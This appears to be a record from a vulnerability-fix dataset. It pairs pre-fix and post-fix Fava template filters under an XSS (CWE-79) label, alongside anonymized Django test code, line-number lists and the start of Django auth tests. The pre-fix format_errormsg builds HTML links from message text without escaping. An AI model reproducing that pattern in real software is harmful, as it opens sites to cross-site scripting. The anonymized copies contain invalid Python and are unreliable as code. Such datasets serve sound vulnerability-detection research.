VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def FUNC_8():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' VAR_5=model.id",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"model": {"pk": 123}}
VAR_9 = VAR_7.render(VAR_8)
assert "==123==" in VAR_9
def FUNC_9(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_10(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_12 = VAR_7.render(VAR_8)
assert "<script" not in VAR_12
def FUNC_11(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_12(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in VAR_12
def FUNC_13(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in VAR_12
def FUNC_14(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[]' in VAR_12
def FUNC_15(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"hash":"' in VAR_12
VAR_13 = VAR_12.index("<script")
VAR_14 = VAR_12[:VAR_13]
VAR_15 = generate_checksum(VAR_14)
assert f'"hash":"{VAR_15}"' in VAR_12
| import re
from django.template.base import Token, TokenType
import pytest
from django_unicorn.components import UnicornView
from django_unicorn.templatetags.unicorn import unicorn
from django_unicorn.utils import generate_checksum
from example.coffee.models import Flavor
class CLASS_0(UnicornView):
VAR_1 = "templates/test_component_parent.html"
class CLASS_1(UnicornView):
VAR_1 = "templates/test_component_kwargs.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_2(UnicornView):
VAR_1 = "templates/test_component_kwargs_with_html_entity.html"
VAR_2 = "world"
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.hello = VAR_4.get("test_kwarg")
class CLASS_3(UnicornView):
VAR_1 = "templates/test_component_model.html"
VAR_5 = None
def __init__(self, *VAR_3, **VAR_4):
super().__init__(**VAR_4)
self.model_id = VAR_4.get("model_id")
class CLASS_4(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_17(self):
self.call("testCall")
class CLASS_5(UnicornView):
VAR_1 = "templates/test_component_parent.html"
def FUNC_17(self):
self.call("testCall2", "hello")
def FUNC_0():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg='tested!'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_9 = VAR_7.render(VAR_8)
assert "<b>tested!</b>" in VAR_9
def FUNC_1():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "<b>variable!</b>" in VAR_9
def FUNC_2():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargsWithHtmlEntity' test_kwarg=test_var.nested",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"test_var": {"nested": "variable!"}}
VAR_9 = VAR_7.render(VAR_8)
assert "->variable!<-" in VAR_9
def FUNC_3(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert VAR_7.parent
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs"
)
def FUNC_4(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 key='blob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:blob"
)
def FUNC_5(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 id='flob'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:flob"
)
def FUNC_6(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 pk=99",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:99"
)
def FUNC_7(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
class CLASS_6:
def __init__(self):
self.id = 178
def FUNC_18(self):
return {"id": self.id}
VAR_8 = {"view": VAR_10, "model": CLASS_6()}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:178"
)
@pytest.mark.django_db
def FUNC_8(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=VAR_10 model=model",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_11 = Flavor(pk=187)
VAR_8 = {"view": VAR_10, "model": VAR_11}
VAR_7.render(VAR_8)
assert (
VAR_7.component_id
== "asdf:tests.templatetags.test_unicorn_render.FakeComponentKwargs:187"
)
def FUNC_9():
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentModel' VAR_5=model.id",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {"model": {"pk": 123}}
VAR_9 = VAR_7.render(VAR_8)
assert "==123==" in VAR_9
def FUNC_10(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_11(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentKwargs' parent=view",
)
VAR_7 = unicorn(None, VAR_6)
VAR_10 = CLASS_0(component_name="test", component_id="asdf")
VAR_8 = {"view": VAR_10}
VAR_12 = VAR_7.render(VAR_8)
assert "<script" not in VAR_12
def FUNC_12(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
def FUNC_13(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall","args":[]}]' in VAR_12
def FUNC_14(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentCalls2'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[{"fn":"testCall2","args":["hello"]}]' in VAR_12
def FUNC_15(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"calls":[]' in VAR_12
def FUNC_16(VAR_0):
settings.DEBUG = True
VAR_6 = Token(
TokenType.TEXT,
"unicorn 'tests.templatetags.test_unicorn_render.FakeComponentParent'",
)
VAR_7 = unicorn(None, VAR_6)
VAR_8 = {}
VAR_12 = VAR_7.render(VAR_8)
assert '<script type="module"' in VAR_12
assert len(re.findall('<script type="module"', VAR_12)) == 1
assert '"hash":"' in VAR_12
VAR_13 = VAR_12.index("<script")
VAR_14 = VAR_12[:VAR_13]
VAR_15 = generate_checksum(VAR_14)
assert f'"hash":"{VAR_15}"' in VAR_12
| [
2,
4,
6,
11,
12,
15,
16,
20,
24,
25,
29,
33,
34,
37,
40,
41,
44,
47,
48,
57,
59,
60,
69,
71,
72,
83,
89,
90,
101,
106,
107,
118,
123,
124,
135,
140,
141,
150,
151,
155,
158,
161,
166,
167,
177,
181,
186,
187,
196,
198,
199,
209,
212,
213,
224,
226,
227,
237,
240,
241,
251,
255,
256,
266,
270,
271,
281,
285,
286,
296,
300,
301,
306
] | [
2,
4,
6,
11,
12,
15,
16,
20,
24,
25,
29,
33,
34,
38,
42,
43,
46,
49,
50,
53,
56,
57,
66,
68,
69,
78,
80,
81,
90,
92,
93,
104,
110,
111,
122,
127,
128,
139,
144,
145,
156,
161,
162,
171,
172,
176,
179,
182,
187,
188,
198,
202,
207,
208,
217,
219,
220,
230,
233,
234,
245,
247,
248,
258,
261,
262,
272,
276,
277,
287,
291,
292,
302,
306,
307,
317,
321,
322,
327
] |
1CWE-79
| """Template filters for Fava.
All functions in this module will be automatically added as template filters.
"""
from __future__ import annotations
import datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
import flask
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
MappingValue = TypeVar("MappingValue")
def remove_keys(
_dict: MutableMapping[str, MappingValue] | None, keys: list[str]
) -> MutableMapping[str, MappingValue]:
"""Remove keys from a dictionary."""
if not _dict:
return {}
new = dict(_dict)
for key in keys:
try:
del new[key]
except KeyError:
pass
return new
def cost_or_value(
inventory: Inventory, date: datetime.date | None = None
) -> Any:
"""Get the cost or value of an inventory."""
return cost_or_value_without_context(
inventory, g.conversion, g.ledger.price_map, date
)
def format_currency(
value: Decimal,
currency: str | None = None,
show_if_zero: bool = False,
invert: bool = False,
) -> str:
"""Format a value using the derived precision for a specified currency."""
if not value and not show_if_zero:
return ""
if value == ZERO:
return g.ledger.format_decimal(ZERO, currency)
if invert:
value = -value
return g.ledger.format_decimal(value, currency)
def format_date(date: datetime.date) -> str:
"""Format a date according to the current interval."""
if g.interval is Interval.YEAR:
return date.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{date.year}Q{(date.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return date.strftime("%YW%W")
if g.interval is Interval.DAY:
return date.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return date.strftime("%b %Y")
def hash_entry(entry: Directive) -> str:
"""Hash an entry."""
return compare.hash_entry(entry)
def balance_children(account: realization.RealAccount) -> Inventory:
"""Compute the total balance of an account."""
return realization.compute_balance(account)
def get_or_create(
account: realization.RealAccount, account_name: str
) -> realization.RealAccount:
"""Get or create a child account."""
if account.account == account_name:
return account
return realization.get_or_create(account, account_name)
FLAGS_TO_TYPES = {"*": "cleared", "!": "pending"}
def flag_to_type(flag: str) -> str:
"""Names for entry flags."""
return FLAGS_TO_TYPES.get(flag, "other")
def should_show(account: TreeNode) -> bool:
"""Determine whether the account should be shown."""
if not account.balance_children.is_empty() or any(
should_show(a) for a in account.children
):
return True
ledger = g.ledger
filtered = g.filtered
if account.name not in ledger.accounts:
return False
fava_options = ledger.fava_options
if not fava_options.show_closed_accounts and filtered.account_is_closed(
account.name
):
return False
if (
not fava_options.show_accounts_with_zero_balance
and account.balance.is_empty()
):
return False
if (
not fava_options.show_accounts_with_zero_transactions
and not account.has_txns
):
return False
return True
def basename(file_path: str) -> str:
"""Return the basename of a filepath."""
return unicodedata.normalize("NFC", os.path.basename(file_path))
def format_errormsg(message: str) -> str:
"""Match account names in error messages and insert HTML links for them."""
match = re.search(ACCOUNT_RE, message)
if not match:
return message
account = match.group()
url = flask.url_for("account", name=account)
return (
message.replace(account, f'<a href="{url}">{account}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def collapse_account(account_name: str) -> bool:
"""Return true if account should be collapsed."""
collapse_patterns = g.ledger.fava_options.collapse_pattern
return any(pattern.match(account_name) for pattern in collapse_patterns)
FILTERS = [
balance_children,
basename,
collapse_account,
cost,
cost_or_value,
cost_or_value,
flag_to_type,
format_currency,
format_date,
format_errormsg,
get_or_create,
hash_entry,
remove_keys,
should_show,
units,
]
| """Template filters for Fava.
All functions in this module will be automatically added as template filters.
"""
from __future__ import annotations
import datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from flask import url_for
from markupsafe import Markup
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
MappingValue = TypeVar("MappingValue")
def remove_keys(
_dict: MutableMapping[str, MappingValue] | None, keys: list[str]
) -> MutableMapping[str, MappingValue]:
"""Remove keys from a dictionary."""
if not _dict:
return {}
new = dict(_dict)
for key in keys:
try:
del new[key]
except KeyError:
pass
return new
def cost_or_value(
inventory: Inventory, date: datetime.date | None = None
) -> Any:
"""Get the cost or value of an inventory."""
return cost_or_value_without_context(
inventory, g.conversion, g.ledger.price_map, date
)
def format_currency(
value: Decimal,
currency: str | None = None,
show_if_zero: bool = False,
invert: bool = False,
) -> str:
"""Format a value using the derived precision for a specified currency."""
if not value and not show_if_zero:
return ""
if value == ZERO:
return g.ledger.format_decimal(ZERO, currency)
if invert:
value = -value
return g.ledger.format_decimal(value, currency)
def format_date(date: datetime.date) -> str:
"""Format a date according to the current interval."""
if g.interval is Interval.YEAR:
return date.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{date.year}Q{(date.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return date.strftime("%YW%W")
if g.interval is Interval.DAY:
return date.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return date.strftime("%b %Y")
def hash_entry(entry: Directive) -> str:
"""Hash an entry."""
return compare.hash_entry(entry)
def balance_children(account: realization.RealAccount) -> Inventory:
"""Compute the total balance of an account."""
return realization.compute_balance(account)
def get_or_create(
account: realization.RealAccount, account_name: str
) -> realization.RealAccount:
"""Get or create a child account."""
if account.account == account_name:
return account
return realization.get_or_create(account, account_name)
FLAGS_TO_TYPES = {"*": "cleared", "!": "pending"}
def flag_to_type(flag: str) -> str:
"""Names for entry flags."""
return FLAGS_TO_TYPES.get(flag, "other")
def should_show(account: TreeNode) -> bool:
"""Determine whether the account should be shown."""
if not account.balance_children.is_empty() or any(
should_show(a) for a in account.children
):
return True
ledger = g.ledger
filtered = g.filtered
if account.name not in ledger.accounts:
return False
fava_options = ledger.fava_options
if not fava_options.show_closed_accounts and filtered.account_is_closed(
account.name
):
return False
if (
not fava_options.show_accounts_with_zero_balance
and account.balance.is_empty()
):
return False
if (
not fava_options.show_accounts_with_zero_transactions
and not account.has_txns
):
return False
return True
def basename(file_path: str) -> str:
"""Return the basename of a filepath."""
return unicodedata.normalize("NFC", os.path.basename(file_path))
def format_errormsg(message: str) -> Markup:
"""Match account names in error messages and insert HTML links for them."""
match = re.search(ACCOUNT_RE, message)
if not match:
return Markup(message)
account = match.group()
url = url_for("account", name=account)
return Markup(
message.replace(account, f'<a href="{url}">{account}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def collapse_account(account_name: str) -> bool:
"""Return true if account should be collapsed."""
collapse_patterns = g.ledger.fava_options.collapse_pattern
return any(pattern.match(account_name) for pattern in collapse_patterns)
FILTERS = [
balance_children,
basename,
collapse_account,
cost,
cost_or_value,
cost_or_value,
flag_to_type,
format_currency,
format_date,
format_errormsg,
get_or_create,
hash_entry,
remove_keys,
should_show,
units,
]
| xss | {
"code": [
"import flask",
"def format_errormsg(message: str) -> str:",
" return message",
" url = flask.url_for(\"account\", name=account)",
" return ("
],
"line_no": [
15,
148,
152,
154,
155
]
} | {
"code": [
"from flask import url_for",
"def format_errormsg(message: str) -> Markup:",
" return Markup(message)",
" url = url_for(\"account\", name=account)",
" return Markup("
],
"line_no": [
22,
149,
153,
155,
156
]
} |
from __future__ import annotations
import .datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
import flask
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import .cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
VAR_0 = TypeVar("MappingValue")
def FUNC_0(
VAR_1: MutableMapping[str, VAR_0] | None, VAR_2: list[str]
) -> MutableMapping[str, VAR_0]:
if not VAR_1:
return {}
VAR_17 = dict(VAR_1)
for key in VAR_2:
try:
del VAR_17[key]
except KeyError:
pass
return VAR_17
def FUNC_1(
VAR_3: Inventory, VAR_4: datetime.date | None = None
) -> Any:
return cost_or_value_without_context(
VAR_3, g.conversion, g.ledger.price_map, VAR_4
)
def FUNC_2(
VAR_5: Decimal,
VAR_6: str | None = None,
VAR_7: bool = False,
VAR_8: bool = False,
) -> str:
if not VAR_5 and not VAR_7:
return ""
if VAR_5 == ZERO:
return g.ledger.format_decimal(ZERO, VAR_6)
if VAR_8:
VAR_5 = -value
return g.ledger.format_decimal(VAR_5, VAR_6)
def FUNC_3(VAR_4: datetime.date) -> str:
if g.interval is Interval.YEAR:
return VAR_4.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{VAR_4.year}Q{(VAR_4.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return VAR_4.strftime("%YW%W")
if g.interval is Interval.DAY:
return VAR_4.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return VAR_4.strftime("%b %Y")
def FUNC_4(VAR_9: Directive) -> str:
return compare.hash_entry(VAR_9)
def FUNC_5(VAR_10: realization.RealAccount) -> Inventory:
return realization.compute_balance(VAR_10)
def FUNC_6(
VAR_10: realization.RealAccount, VAR_11: str
) -> realization.RealAccount:
if VAR_10.account == VAR_11:
return VAR_10
return realization.get_or_create(VAR_10, VAR_11)
VAR_12 = {"*": "cleared", "!": "pending"}
def FUNC_7(VAR_13: str) -> str:
return VAR_12.get(VAR_13, "other")
def FUNC_8(VAR_10: TreeNode) -> bool:
if not VAR_10.balance_children.is_empty() or any(
FUNC_8(a) for a in VAR_10.children
):
return True
VAR_18 = g.ledger
VAR_19 = g.filtered
if VAR_10.name not in VAR_18.accounts:
return False
VAR_20 = VAR_18.fava_options
if not VAR_20.show_closed_accounts and VAR_19.account_is_closed(
VAR_10.name
):
return False
if (
not VAR_20.show_accounts_with_zero_balance
and VAR_10.balance.is_empty()
):
return False
if (
not VAR_20.show_accounts_with_zero_transactions
and not VAR_10.has_txns
):
return False
return True
def FUNC_9(VAR_14: str) -> str:
return unicodedata.normalize("NFC", os.path.basename(VAR_14))
def FUNC_10(VAR_15: str) -> str:
VAR_21 = re.search(ACCOUNT_RE, VAR_15)
if not VAR_21:
return VAR_15
VAR_10 = VAR_21.group()
VAR_22 = flask.url_for("account", name=VAR_10)
return (
VAR_15.replace(VAR_10, f'<a href="{VAR_22}">{VAR_10}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def FUNC_11(VAR_11: str) -> bool:
VAR_23 = g.ledger.fava_options.collapse_pattern
return any(pattern.match(VAR_11) for pattern in VAR_23)
VAR_16 = [
FUNC_5,
FUNC_9,
FUNC_11,
cost,
FUNC_1,
cost_or_value,
FUNC_7,
FUNC_2,
FUNC_3,
FUNC_10,
FUNC_6,
FUNC_4,
FUNC_0,
FUNC_8,
units,
]
|
from __future__ import annotations
import .datetime
import os
import re
import unicodedata
from typing import Any
from typing import MutableMapping
from typing import TypeVar
from beancount.core import compare
from beancount.core import realization
from beancount.core.account import ACCOUNT_RE
from beancount.core.data import Directive
from beancount.core.inventory import Inventory
from beancount.core.number import Decimal
from beancount.core.number import ZERO
from flask import .url_for
from markupsafe import Markup
from fava.context import g
from fava.core.conversion import cost
from fava.core.conversion import .cost_or_value as cost_or_value_without_context
from fava.core.conversion import units
from fava.core.tree import TreeNode
from fava.util.date import Interval
VAR_0 = TypeVar("MappingValue")
def FUNC_0(
VAR_1: MutableMapping[str, VAR_0] | None, VAR_2: list[str]
) -> MutableMapping[str, VAR_0]:
if not VAR_1:
return {}
VAR_17 = dict(VAR_1)
for key in VAR_2:
try:
del VAR_17[key]
except KeyError:
pass
return VAR_17
def FUNC_1(
VAR_3: Inventory, VAR_4: datetime.date | None = None
) -> Any:
return cost_or_value_without_context(
VAR_3, g.conversion, g.ledger.price_map, VAR_4
)
def FUNC_2(
VAR_5: Decimal,
VAR_6: str | None = None,
VAR_7: bool = False,
VAR_8: bool = False,
) -> str:
if not VAR_5 and not VAR_7:
return ""
if VAR_5 == ZERO:
return g.ledger.format_decimal(ZERO, VAR_6)
if VAR_8:
VAR_5 = -value
return g.ledger.format_decimal(VAR_5, VAR_6)
def FUNC_3(VAR_4: datetime.date) -> str:
if g.interval is Interval.YEAR:
return VAR_4.strftime("%Y")
if g.interval is Interval.QUARTER:
return f"{VAR_4.year}Q{(VAR_4.month - 1) // 3 + 1}"
if g.interval is Interval.WEEK:
return VAR_4.strftime("%YW%W")
if g.interval is Interval.DAY:
return VAR_4.strftime("%Y-%m-%d")
assert g.interval is Interval.MONTH
return VAR_4.strftime("%b %Y")
def FUNC_4(VAR_9: Directive) -> str:
return compare.hash_entry(VAR_9)
def FUNC_5(VAR_10: realization.RealAccount) -> Inventory:
return realization.compute_balance(VAR_10)
def FUNC_6(
VAR_10: realization.RealAccount, VAR_11: str
) -> realization.RealAccount:
if VAR_10.account == VAR_11:
return VAR_10
return realization.get_or_create(VAR_10, VAR_11)
VAR_12 = {"*": "cleared", "!": "pending"}
def FUNC_7(VAR_13: str) -> str:
return VAR_12.get(VAR_13, "other")
def FUNC_8(VAR_10: TreeNode) -> bool:
if not VAR_10.balance_children.is_empty() or any(
FUNC_8(a) for a in VAR_10.children
):
return True
VAR_18 = g.ledger
VAR_19 = g.filtered
if VAR_10.name not in VAR_18.accounts:
return False
VAR_20 = VAR_18.fava_options
if not VAR_20.show_closed_accounts and VAR_19.account_is_closed(
VAR_10.name
):
return False
if (
not VAR_20.show_accounts_with_zero_balance
and VAR_10.balance.is_empty()
):
return False
if (
not VAR_20.show_accounts_with_zero_transactions
and not VAR_10.has_txns
):
return False
return True
def FUNC_9(VAR_14: str) -> str:
return unicodedata.normalize("NFC", os.path.basename(VAR_14))
def FUNC_10(VAR_15: str) -> Markup:
VAR_21 = re.search(ACCOUNT_RE, VAR_15)
if not VAR_21:
return Markup(VAR_15)
VAR_10 = VAR_21.group()
VAR_22 = url_for("account", name=VAR_10)
return Markup(
VAR_15.replace(VAR_10, f'<a href="{VAR_22}">{VAR_10}</a>')
.replace("for '", "for ")
.replace("': ", ": ")
)
def FUNC_11(VAR_11: str) -> bool:
VAR_23 = g.ledger.fava_options.collapse_pattern
return any(pattern.match(VAR_11) for pattern in VAR_23)
VAR_16 = [
FUNC_5,
FUNC_9,
FUNC_11,
cost,
FUNC_1,
cost_or_value,
FUNC_7,
FUNC_2,
FUNC_3,
FUNC_10,
FUNC_6,
FUNC_4,
FUNC_0,
FUNC_8,
units,
]
| [
2,
6,
14,
23,
30,
32,
33,
47,
48,
56,
57,
72,
73,
86,
87,
91,
92,
96,
97,
105,
106,
108,
109,
113,
114,
141,
142,
146,
147,
160,
161,
166,
167,
185,
1,
2,
3,
4,
37,
52,
64,
75,
89,
94,
101,
111,
116,
144,
149,
163
] | [
2,
6,
14,
24,
31,
33,
34,
48,
49,
57,
58,
73,
74,
87,
88,
92,
93,
97,
98,
106,
107,
109,
110,
114,
115,
142,
143,
147,
148,
161,
162,
167,
168,
186,
1,
2,
3,
4,
38,
53,
65,
76,
90,
95,
102,
112,
117,
145,
150,
164
] |
1CWE-79
| import itertools
import os
import re
try:
from urllib.parse import urlparse, ParseResult
except ImportError: # Python 2
from urlparse import urlparse, ParseResult
from django.conf import global_settings, settings
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import urlquote
from django.utils._os import upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertTrue(SESSION_KEY in self.client.session)
return response
def logout(self):
response = self.client.get('/admin/logout/')
self.assertEqual(response.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def assertFormError(self, response, error):
"""Assert that error is found in response.context['form'] errors"""
form_errors = list(itertools.chain(*response.context['form'].errors.values()))
self.assertIn(force_text(error), form_errors)
def assertURLEqual(self, url, expected, parse_qs=False):
"""
